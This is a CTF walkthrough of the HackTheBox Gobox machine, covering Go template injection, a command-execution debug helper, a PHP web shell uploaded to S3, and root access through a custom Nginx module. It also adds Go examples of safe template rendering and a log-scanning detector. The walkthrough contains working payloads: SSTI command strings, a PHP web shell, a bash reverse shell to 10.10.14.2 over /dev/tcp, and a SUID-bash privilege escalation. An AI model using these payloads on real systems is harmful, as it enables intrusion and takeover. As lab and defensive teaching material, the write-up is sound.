
HackTheBox Gobox Writeup

This writeup walks through Gobox, a medium-difficulty HackTheBox Capture The Flag (CTF) machine. It keeps each step short and explains the key concepts (Go template injection, an exposed debug command, AWS CLI access to an S3 bucket, and a custom Nginx module) clearly enough to be accessible for players at that level.

Add Hosts

10.10.11.113 gobox.htb

Script to add hosts automatically

# Append the entry to /etc/hosts only if it is not already present
ip="10.10.11.113"
domain="gobox.htb"
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV gobox.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-30 02:46 CEST
Nmap scan report for gobox.htb (10.10.11.113)
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http       nginx
|_http-title: Hacking eSports | {{.Title}}
8080/tcp open     http       nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Identify the Vulnerability

  • The target site at http://gobox.htb:8080/ is running a Go-based application, as indicated by the X-Forwarded-Server: golang header in BurpSuite responses (the unrendered {{.Title}} in the port 80 page title seen in the Nmap output points the same way).
  • Based on this, the application could be vulnerable to Server-Side Template Injection (SSTI) through Go templates.

Initial SSTI Test

  • On the /forgot page, insert the payload {{ . }} in the email field to test for template injection.
  • If vulnerable, this will reveal Go template context variables or throw an error exposing internal details of the server.

Exploiting DebugCmd

  • After logging in with the credentials sent by email from the /forgot page, the application's source code is revealed.
  • In it you discover the DebugCmd function exposed on the template context, which executes system commands and is therefore callable from an injected template action.

Test system commands using the following payloads:

{{ .DebugCmd "id" }}  // Check for user privileges
{{ .DebugCmd "env" }}  // View environment variables
{{ .DebugCmd "aws s3 ls s3://" }}  // List S3 buckets
{{ .DebugCmd "aws s3 ls s3://website" }}  // List contents of a specific bucket
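The root cause behind the SSTI above is worth seeing in code. The following Go program is an added example, not the Gobox application's source: the Page type, the Greeting method and the RenderUnsafe/RenderSafe functions are hypothetical. RenderUnsafe concatenates the submitted value into the template source, so any {{ ... }} action the user types is parsed and executed, and any method reachable from the context value (here a harmless Greeting; on Gobox the DebugCmd described above) can be called. RenderSafe keeps the template source constant and passes the input as data only, and LooksLikeTemplateProbe is a simple detection signal for inputs that carry template delimiters.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"regexp"
)

// Page is a hypothetical template context, standing in for whatever
// struct the real application passes to its templates.
type Page struct {
	Title string
	Email string
}

// Greeting is a harmless method on the context. Any method reachable from
// the context value is callable from a template action, which is exactly
// why an exposed command-execution helper on the context is dangerous.
func (p Page) Greeting() string {
	return "Hello, " + p.Title
}

// RenderUnsafe shows the vulnerable pattern: user input is spliced into the
// template *source*, so "{{ .Greeting }}" submitted by the user is parsed
// and executed by the template engine instead of being displayed.
func RenderUnsafe(input string, page Page) (string, error) {
	src := "<p>Reset link sent to " + input + "</p>"
	tmpl, err := template.New("forgot").Parse(src)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, page); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// forgotTmpl is parsed once from a constant; user input never reaches Parse.
var forgotTmpl = template.Must(
	template.New("forgot").Parse("<p>Reset link sent to {{ .Email }}</p>"))

// RenderSafe treats the input purely as data: it is HTML-escaped and printed
// verbatim, so template delimiters in it are inert.
func RenderSafe(input string, page Page) (string, error) {
	page.Email = input
	var buf bytes.Buffer
	if err := forgotTmpl.Execute(&buf, page); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// actionRe matches a Go template action; useful as an input-validation or
// WAF/log signal, since legitimate e-mail addresses never contain {{ }}.
var actionRe = regexp.MustCompile(`\{\{.*?\}\}`)

// LooksLikeTemplateProbe reports whether the input carries template delimiters.
func LooksLikeTemplateProbe(s string) bool {
	return actionRe.MatchString(s)
}

func main() {
	// Constructed input: what an attacker would type into the e-mail field.
	probe := "{{ .Greeting }}"
	page := Page{Title: "Hacking eSports"}

	unsafeOut, err := RenderUnsafe(probe, page)
	fmt.Printf("unsafe: %q err=%v\n", unsafeOut, err)

	safeOut, err := RenderSafe(probe, page)
	fmt.Printf("safe:   %q err=%v\n", safeOut, err)

	fmt.Println("probe flagged:", LooksLikeTemplateProbe(probe))
}
```

The unsafe path prints the result of calling Greeting, proving the input was executed as a template; the safe path prints the literal text {{ .Greeting }}. A field the context does not have (for example {{ .NoSuchField }}) makes the unsafe path return an execution error, which is the "error exposing internal details" mentioned in the initial test above.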

Preparing the Payload

  • The goal is to upload a PHP reverse shell to the S3 bucket via the AWS CLI exposed through DebugCmd.
  • First, generate a base64-encoded PHP reverse shell:

echo '<?php system($_GET['cmd']); ?>' | base64

This will output the encoded payload:

PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
  • Use DebugCmd to decode and save this as a PHP file on the target system, then upload it to the S3 bucket:

{{ .DebugCmd "echo -n PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= | base64 -d > /tmp/evil.php" }}
{{ .DebugCmd "aws s3 cp /tmp/evil.php s3://website/evil.php" }}

Accessing the Payload

  • Once the PHP shell is uploaded, the bucket is served by the site on port 80, so it can be accessed via:

http://gobox.htb/evil.php

You can then execute commands by passing the cmd parameter.

Triggering the Reverse Shell

To establish a reverse shell, use the following bash command:

bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'

Since this needs to be URL-encoded, use sed to encode only the & and / characters:

echo -n "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'" | sed -e 's:/:%2f:g' -e 's:&:%26:g'

Setting Up a Listener

On your local machine, set up a listener to catch the reverse shell:

nc -lvnp 9001

Triggering the Shell

To trigger the reverse shell, visit:

http://gobox.htb/evil.php?cmd=bash -c '%2fbin%2fbash -i >%26 %2fdev%2ftcp%2f10.10.14.2%2f9001 0>%261'

Get an Interactive Shell

Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm;

Nginx Module Exploitation (ngx_http_execute_module)

Initial Enumeration

Retrieve the user flag from /home/ubuntu/user.txt:

cat /home/ubuntu/user.txt

Investigate Nginx configuration:

ls /etc/nginx/sites-enabled
cat /etc/nginx/sites-enabled/default

You find the custom directive command on;, which is not part of a default Nginx setup and therefore indicates a third-party module loaded into this server.

Identifying the Custom Module

A Google search for command on; nginx github reveals the NginxExecute module, which allows command execution via Nginx.

Verifying the Nginx Module

  • To confirm the presence of this module and its functionality, you inspect the Nginx module binary for references to the run function:
strings /usr/share/nginx/modules/ngx_http_execute_module.so | grep run

Command Execution

Use the ippsec.run parameter in HTTP requests to execute system commands. Test with a basic command, then read the root flag:

curl -g "http://127.0.0.1:8000/?ippsec.run[id]"
curl -g "http://127.0.0.1:8000/?ippsec.run[cat /root/root.txt]"

Finally, set the SUID bit on /bin/bash and spawn a privileged shell:

curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 4755 /bin/bash]"
/bin/bash -p

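From the defender's side, both the template probes against the web application and the custom Nginx module's ippsec.run[...] parameter leave a footprint in request logs whenever they travel in the query string. The following Go program is an added example, not part of the original post or of either project; the access-log lines are constructed for the example and the rule names are hypothetical. It extracts and URL-decodes the request target from combined-format log lines and flags Go template actions, the execute-module parameter, and a cmd query parameter. The first sample line (the POST to /forgot) deliberately yields no finding: the injected payload sits in the request body, which the access log does not record, so application-side input validation or logging is needed to catch that step.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one suspicious request found in the scanned log (hypothetical type).
type Finding struct {
	Line    int    // 1-based index of the log line
	Rule    string // which detection rule fired
	Request string // decoded request target
}

// SampleLog holds constructed nginx combined-format lines; they are not real logs.
var SampleLog = []string{
	`10.10.14.2 - - [30/Sep/2024:02:50:11 +0200] "POST /forgot HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
	`10.10.14.2 - - [30/Sep/2024:02:52:03 +0200] "GET /evil.php?cmd=id HTTP/1.1" 200 48 "-" "curl/7.88"`,
	`127.0.0.1 - - [30/Sep/2024:02:55:40 +0200] "GET /?ippsec.run%5Bid%5D HTTP/1.1" 200 39 "-" "curl/7.88"`,
	`10.10.14.2 - - [30/Sep/2024:02:51:00 +0200] "GET /forgot?email=%7B%7B+.+%7D%7D HTTP/1.1" 200 1024 "-" "Mozilla/5.0"`,
	`10.10.14.9 - - [30/Sep/2024:03:00:00 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"`,
}

// requestRe pulls the request target out of the quoted request line.
var requestRe = regexp.MustCompile(`"[A-Z]+ (\S+) HTTP/[0-9.]+"`)

// decodeTarget undoes percent-encoding so "%7B%7B" is seen as "{{".
// On a decoding error the raw target is returned unchanged.
func decodeTarget(raw string) string {
	if d, err := url.QueryUnescape(raw); err == nil {
		return d
	}
	return raw
}

// ClassifyRequest returns the first detection rule matching a decoded target, or "".
func ClassifyRequest(target string) string {
	switch {
	case strings.Contains(target, "{{") && strings.Contains(target, "}}"):
		return "go-template-action-in-request"
	case strings.Contains(target, "ippsec.run["):
		return "nginx-execute-module-parameter"
	}
	// A bare "cmd" query parameter is a common web-shell convention worth reviewing.
	if u, err := url.Parse(target); err == nil && u.Query().Get("cmd") != "" {
		return "cmd-query-parameter"
	}
	return ""
}

// ScanAccessLog runs the rules over every line and collects the findings in order.
func ScanAccessLog(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		m := requestRe.FindStringSubmatch(line)
		if m == nil {
			continue // not a request line we understand
		}
		target := decodeTarget(m[1])
		if rule := ClassifyRequest(target); rule != "" {
			out = append(out, Finding{Line: i + 1, Rule: rule, Request: target})
		}
	}
	return out
}

func main() {
	for _, f := range ScanAccessLog(SampleLog) {
		fmt.Printf("line %d: %-32s %s\n", f.Line, f.Rule, f.Request)
	}
}
```

Run against the sample, the scanner reports lines 2, 3 and 4 and stays silent on the benign GET and on the POST whose payload never reached the log. Because the execute module in this box answers on 127.0.0.1:8000, requests carrying ippsec.run with a loopback client address are a particularly clear indicator that something already on the host is driving it.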
This post is licensed under CC BY 4.0 by the author.